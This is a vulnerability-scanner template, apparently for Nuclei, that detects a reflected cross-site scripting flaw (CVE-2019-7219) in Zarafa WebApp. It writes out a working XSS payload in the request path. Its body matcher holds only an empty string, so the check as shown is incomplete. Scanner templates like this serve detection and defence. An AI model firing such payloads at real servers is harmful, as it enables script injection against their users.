id: CVE-2019-7219 info: name: Zarafa WebApp Reflected XSS author: pdteam severity: medium description: | Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public tags: cve,cve2019,zarafa,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2019-7219 cwe-id: CWE-79 requests: - method: GET path: - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200